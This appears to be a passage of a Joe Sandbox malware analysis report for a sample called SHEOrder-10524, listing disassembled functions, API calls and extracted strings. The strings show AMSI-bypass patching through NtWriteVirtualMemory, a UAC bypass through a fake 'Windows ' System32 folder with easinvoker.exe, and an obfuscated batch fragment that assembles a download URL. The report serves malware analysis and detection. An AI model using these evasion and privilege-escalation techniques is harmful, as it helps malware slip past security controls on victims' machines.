                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Handle$Close$AddressCreateLibraryLoadModuleObjectProcProcessSingleUserWait
                                                                                                                                                                    • String ID: *"C:\Users\Public\Libraries\WagotghlO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                                                                                                    • API String ID: 1205125484-1515945561
                                                                                                                                                                    • Opcode ID: 30d5de789b2610fdce9f6f12dd2300de84a250d599f692e0ddf515c6c7e4c223
                                                                                                                                                                    • Instruction ID: 429d0130ad13bf1a2522592fa9fb54d2b1ca369c1fb17a02956315f36ecf5ca7
                                                                                                                                                                    • Opcode Fuzzy Hash: 30d5de789b2610fdce9f6f12dd2300de84a250d599f692e0ddf515c6c7e4c223
                                                                                                                                                                    • Instruction Fuzzy Hash: C6F1E03DA001589FEB50FBA8D890FDE73BAAF85701F608065A105E7354DB74ED8A8F52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028D7AC0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 12444 28d7ac0-28d7adb LoadLibraryW 12445 28d7add-28d7ae6 GetProcAddress 12444->12445 12446 28d7b0a-28d7b12 12444->12446 12447 28d7ae8-28d7b00 NtWriteVirtualMemory 12445->12447 12448 28d7b04-28d7b05 FreeLibrary 12445->12448 12447->12448 12449 28d7b02 12447->12449 12448->12446 12449->12448
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(bcrypt,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360,028D9A30,UacInitialize,02924360,028D9A30,00000870,029243DC,ScanString,02924360,028D9A30), ref: 028D7AD2
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028D7ADF
                                                                                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360,028D9A30,UacInitialize), ref: 028D7AF6
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360,028D9A30,UacInitialize,02924360,028D9A30,00000870,029243DC), ref: 028D7B05
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                                                    • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                                                    • API String ID: 1002360270-4067648912
                                                                                                                                                                    • Opcode ID: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
                                                                                                                                                                    • Instruction ID: 48c1915e568266e88d7a46258be029e8c4ac435f1c88b459b4a9a4a701648486
                                                                                                                                                                    • Opcode Fuzzy Hash: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
                                                                                                                                                                    • Instruction Fuzzy Hash: 17F0E97E5053243ED12161285C40EBF635DCBC3761F10463DF558D6280E771C808C3B2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028D7966 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24librarymemorynativeCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028D7975
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028D797B
                                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028D799B
                                                                                                                                                                    Strings
                                                                                                                                                                    • NtAllocateVirtualMemory, xrefs: 028D796B
                                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 028D7970
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                                    • API String ID: 421316089-2206134580
                                                                                                                                                                    • Opcode ID: e11e584079cd4ba0150c43c8ff8f5abc2b684fa7d38d6aa4f607e645690bf816
                                                                                                                                                                    • Instruction ID: 1bb0f7c25f24a5dde320fee85e4cd113c3c7e5b750706ed0fcd2938dbfbcfb8f
                                                                                                                                                                    • Opcode Fuzzy Hash: e11e584079cd4ba0150c43c8ff8f5abc2b684fa7d38d6aa4f607e645690bf816
                                                                                                                                                                    • Instruction Fuzzy Hash: 09E01ABA64020CBFDB00EE98DD41EEA37ACAB08611F004415BA09D7201D734E9148BB5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028D7968 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23librarymemorynativeCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028D7975
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028D797B
                                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028D799B
                                                                                                                                                                    Strings
                                                                                                                                                                    • NtAllocateVirtualMemory, xrefs: 028D796B
                                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 028D7970
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                                    • API String ID: 421316089-2206134580
                                                                                                                                                                    • Opcode ID: 02bfd1e9bf0a1acc99d45c0b3e5052662ad5fcd59af9abaca165d4abaa22333a
                                                                                                                                                                    • Instruction ID: ae2b0339f7f05ed92c063a806d34358de3a87543eedca69f232e03fe5ef1f5aa
                                                                                                                                                                    • Opcode Fuzzy Hash: 02bfd1e9bf0a1acc99d45c0b3e5052662ad5fcd59af9abaca165d4abaa22333a
                                                                                                                                                                    • Instruction Fuzzy Hash: 5BE01ABA54020CBFDB00EE98D941EDA37ACAB08611F004415BA09D7201D734E5148BB5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028DC4DC Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028C4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028C4EF2
                                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028DC5AC), ref: 028DC517
                                                                                                                                                                    • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,028DC5AC), ref: 028DC547
                                                                                                                                                                    • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 028DC55C
                                                                                                                                                                    • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 028DC588
                                                                                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 028DC591
                                                                                                                                                                      • Part of subcall function 028C4C24: SysFreeString.OLEAUT32(028DD42C), ref: 028C4C32
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1897104825-0
                                                                                                                                                                    • Opcode ID: 99fdb64ddb09d938c9cea58e092c73d019e8dac4f91796c72478160b496739d0
                                                                                                                                                                    • Instruction ID: adff1aed4e543ce93da3cee7cf3d8f91a2642de700f2f0539633e2eb57b1a209
                                                                                                                                                                    • Opcode Fuzzy Hash: 99fdb64ddb09d938c9cea58e092c73d019e8dac4f91796c72478160b496739d0
                                                                                                                                                                    • Instruction Fuzzy Hash: BD219279A502087AEB11EAD8CC52FDEB7BDAB08700F500466F600E71C0DAB4BA498B65
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028DC8AC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 028DC9EA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CheckConnectionInternet
                                                                                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                                                                                    • Opcode ID: ce2aece50b9512c3f2e3623ea72fb177954d4072323a9a4d3da3d944b3028d78
                                                                                                                                                                    • Instruction ID: 1a79a1c3ab432984f7c314abf170c7220a5e6926e4808c88dafbdeacdeeb6589
                                                                                                                                                                    • Opcode Fuzzy Hash: ce2aece50b9512c3f2e3623ea72fb177954d4072323a9a4d3da3d944b3028d78
                                                                                                                                                                    • Instruction Fuzzy Hash: A641087DA502589BEB10EAA8C850EDEB3BAEF48700F21442AE001E7254DB74E949CB52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028DC3F6 Relevance: 6.1, APIs: 4, Instructions: 81nativefileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028C4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028C4EF2
                                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028DC4CA), ref: 028DC437
                                                                                                                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028DC471
                                                                                                                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028DC49E
                                                                                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028DC4A7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3764614163-0
                                                                                                                                                                    • Opcode ID: 273fd0b716f58364e920db982dad8f92b4b770da0910eb73c6f80bc6aeccd7f2
                                                                                                                                                                    • Instruction ID: 54cde8b09a3675f7ceca2fc7a6e44d751a037decc3d96cc75e18605adc8431c3
                                                                                                                                                                    • Opcode Fuzzy Hash: 273fd0b716f58364e920db982dad8f92b4b770da0910eb73c6f80bc6aeccd7f2
                                                                                                                                                                    • Instruction Fuzzy Hash: 7221E579A402087AEB10EA94CC52FDEB7BDEB04710F604466F604F71D0D7B4BE488A55
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028DC3F8 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028C4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028C4EF2
                                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028DC4CA), ref: 028DC437
                                                                                                                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028DC471
                                                                                                                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028DC49E
                                                                                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028DC4A7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3764614163-0
                                                                                                                                                                    • Opcode ID: aaf869667c115ea3a2aff8a096a48d08efc765ef6eee678ed4eca607c8f8588b
                                                                                                                                                                    • Instruction ID: a48210264787057712350812a663b3587d34beb6266228fa4d65ff7ac22e6123
                                                                                                                                                                    • Opcode Fuzzy Hash: aaf869667c115ea3a2aff8a096a48d08efc765ef6eee678ed4eca607c8f8588b
                                                                                                                                                                    • Instruction Fuzzy Hash: 0B21F179A40208BAEB10EBA4CC52FDEB7BDEB04B10F604466F604F71D0D7B4BE488A55
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028DC368 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028C4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028C4EF2
                                                                                                                                                                    • RtlInitUnicodeString.N(?,?,00000000,028DC3E2), ref: 028DC390
                                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,028DC3E2), ref: 028DC3A6
                                                                                                                                                                    • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,028DC3E2), ref: 028DC3C5
                                                                                                                                                                      • Part of subcall function 028C4C24: SysFreeString.OLEAUT32(028DD42C), ref: 028C4C32
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1694942484-0
                                                                                                                                                                    • Opcode ID: 95ffd6e46e08f7e426657ce4b1cb6ef0991998b3b126d763e019b37d6a174db6
                                                                                                                                                                    • Instruction ID: 611eea78dad611dcc0250f271b1a8eda7d48a117342fe2d17d78257d6f5d9659
                                                                                                                                                                    • Opcode Fuzzy Hash: 95ffd6e46e08f7e426657ce4b1cb6ef0991998b3b126d763e019b37d6a174db6
                                                                                                                                                                    • Instruction Fuzzy Hash: F301F87D944208BBDB15EBA4CD51FCDB3FDEB48700F614566E601E6180E774AB08CA65
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028D6D84 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028D6D28: CLSIDFromProgID.OLE32(00000000,?,00000000,028D6D75,?,?,?,00000000), ref: 028D6D55
                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,028D6E68,00000000,00000000,028D6DE7,?,00000000,028D6E57), ref: 028D6DD3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFromInstanceProg
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2151042543-0
                                                                                                                                                                    • Opcode ID: 350d2021ca87de016ca95066f4c78071c2cc7d409d52c1f196a8a2fed119de86
                                                                                                                                                                    • Instruction ID: 66c185ec2ebe637fb5a552d17b9969b88cea8cca3e902477659163e368e8b82e
                                                                                                                                                                    • Opcode Fuzzy Hash: 350d2021ca87de016ca95066f4c78071c2cc7d409d52c1f196a8a2fed119de86
                                                                                                                                                                    • Instruction Fuzzy Hash: 4001247C6087086EEB01DF75FC1286F7BACDB49B10FB10435F400E2640F638A904C961
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028E1AC0 Relevance: 46.7, APIs: 2, Strings: 23, Instructions: 2959sleepprocessCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028D7BE8: LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
                                                                                                                                                                      • Part of subcall function 028DC3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028DC4CA), ref: 028DC437
                                                                                                                                                                      • Part of subcall function 028DC3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028DC471
                                                                                                                                                                      • Part of subcall function 028DC3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028DC49E
                                                                                                                                                                      • Part of subcall function 028DC3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028DC4A7
                                                                                                                                                                      • Part of subcall function 028C7E18: GetFileAttributesA.KERNEL32(00000000,?,028DE0EE,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanString,02924344,028E8FEC,UacScan,02924344,028E8FEC,UacInitialize), ref: 028C7E23
                                                                                                                                                                    • Sleep.KERNEL32(00001770,UacScan,02924344,028E8FEC,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanBuffer,02924344,028E8FEC,OpenSession,02924344,028E8FEC), ref: 028E3094
                                                                                                                                                                      • Part of subcall function 028DC368: RtlInitUnicodeString.N(?,?,00000000,028DC3E2), ref: 028DC390
                                                                                                                                                                      • Part of subcall function 028DC368: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,028DC3E2), ref: 028DC3A6
                                                                                                                                                                      • Part of subcall function 028DC368: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,028DC3E2), ref: 028DC3C5
                                                                                                                                                                    • WinExec.KERNEL32(00000000,028E953C), ref: 028E436D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FilePath$NameName_$AddressAttributesCloseCreateDeleteExecHandleInitLibraryLoadModuleProcSleepStringUnicodeWrite
                                                                                                                                                                    • String ID: .url$@echo offset "Nnqr=set "%Nnqr%"njyC=="%Nnqr%"qkMvMLsfma%njyC%http"%Nnqr%"dbvWEsxWns%njyC%rem "%Nnqr%"NpzRZtRBVV%njyC%Cloa"%Nnqr%"ftNVZzSZxa%njyC%/Bat"%Nnqr%"TwupSEtIWD%njyC%gith"%Nnqr%"yIGacXULig%njyC%k"%Nnqr%"uGlGnqCSun%njyC%h2sh"%Nnqr%"FU$C:\Users\Public\$C:\Users\Public\alpha.exe$C:\Windows \System32\NETUTILS.dll$C:\Windows \System32\aaa.bat$C:\Windows \System32\easinvoker.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CO.bat$HotKey=$IconIndex=$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$er.e$s.d
                                                                                                                                                                    • API String ID: 102611719-1347945576
                                                                                                                                                                    • Opcode ID: 72104f17388f0843a71240446d9e311656015aeaffe312629b0b4bfe9513f614
                                                                                                                                                                    • Instruction ID: 32170333865af8c01ef16150da6da2ea2ec518cde8ebb86ed4d88ab043c99684
                                                                                                                                                                    • Opcode Fuzzy Hash: 72104f17388f0843a71240446d9e311656015aeaffe312629b0b4bfe9513f614
                                                                                                                                                                    • Instruction Fuzzy Hash: 0E53EC3DA501699FEF60EB68D890EDD73B6AF45301F2044A9A009E7714DB70EE89CF52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028E4EFE Relevance: 18.4, APIs: 2, Strings: 8, Instructions: 941processCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 10531 28e4efe-28e53da call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c4964 call 28c4698 call 28dd318 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 10668 28e53e0-28e565b call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c48b0 10531->10668 10669 28e53db call 28d7be8 10531->10669 10742 28e6190-28e638f call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c48b0 10668->10742 10743 28e5661-28e5cb3 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 